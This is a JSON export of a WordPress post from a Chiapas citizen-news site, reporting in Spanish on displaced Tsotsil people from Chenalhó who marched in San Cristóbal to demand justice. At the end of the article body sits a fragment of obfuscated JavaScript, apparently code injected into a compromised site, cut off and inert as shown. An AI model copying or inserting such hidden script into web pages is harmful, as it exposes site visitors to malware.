{"id":6199,"date":"2022-10-27T01:42:41","date_gmt":"2022-10-27T01:42:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6199"},"modified":"2022-10-27T01:42:42","modified_gmt":"2022-10-27T01:42:42","slug":"amagan-desplazados-de-chenalho-con-movilizaciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6199","title":{"rendered":"Amagan desplazados de Chenalh\u00f3 con movilizaciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-26-at-11.10.07-AM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-6200\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-26-at-11.10.07-AM-1-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-26-at-11.10.07-AM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-26-at-11.10.07-AM-1-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-26-at-11.10.07-AM-1.jpeg 1408w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Desplazados de Santa Martha municipio de Chenalh\u00f3, iniciaron una caravana hasta San Crist\u00f3bal, y tras marchar en esta ciudad, fueron atendidos por autoridades de la Secretar\u00eda General de Gobierno, que evit\u00f3 que los ind\u00edgenas Tsotsiles, viajar\u00e1n hasta Tuxtla Guti\u00e9rrez, como lo ten\u00edan programado.<\/p>\n\n\n\n<p>\u201cManifestamos nuestra demandas debido al proceso que hemos actuado para defender nuestras vidas ya nosotros estamos sentenciados de muerte por los paramilitares y grupo armado, Ya que el gobierno les ha dado m\u00e1s atenci\u00f3n a los asesinos, eso les fortalece a despojo y robo de nuestras pertenencias y tierras que nos corresponde por nuestros derechos ancestrales de nuestros antepasados\u201d, dijo el vocero, Manuel G\u00f3mez Velasco.<\/p>\n\n\n\n<p>En conferencia de prensa despu\u00e9s de realizar una marcha por varias calles de esta ciudad, dejaron en claro que no se cansar\u00e1n de exigir \u201ccastiguen a los responsables de la quema de nuestras viviendas lucharemos y seguiremos luchando para defender nuestras vidas\u201d.<\/p>\n\n\n\n<p>Una comisi\u00f3n de 10 desplazados, fue atendido por Leonel Reyes, Coordinador de delegados de gobierno con quienes se comprometi\u00f3 a dar seguimiento al tema, as\u00ed como el apoyo necesario que soliciten, entre ellas el ejecutar las \u00f3rdenes de aprehensi\u00f3n en contra de los responsables, aunque &nbsp;no acudi\u00f3 ning\u00fan representante de la Fiscal\u00eda<\/p>\n\n\n\n<p>Despu\u00e9s de dicha reuni\u00f3n, los desplazados retornaron a la comunidad de Polh\u00f3, municipio de Chenalh\u00f3, que es d\u00f3nde se encuentran desplazados desde hace varios d\u00edas, y ya no continuaron su marcha a Tuxtla como lo hab\u00edan anunciado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Desplazados de Santa Martha municipio de Chenalh\u00f3, iniciaron una caravana hasta San Crist\u00f3bal, y tras marchar en esta ciudad, fueron atendidos por autoridades de la Secretar\u00eda General de Gobierno, que evit\u00f3 que los ind\u00edgenas Tsotsiles, viajar\u00e1n hasta Tuxtla Guti\u00e9rrez, como lo ten\u00edan programado. \u201cManifestamos nuestra demandas debido al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6200,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6199","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6199","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6199"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6199\/revisions"}],"predecessor-version":[{"id":6201,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6199\/revisions\/6201"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6200"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6199"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6199"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}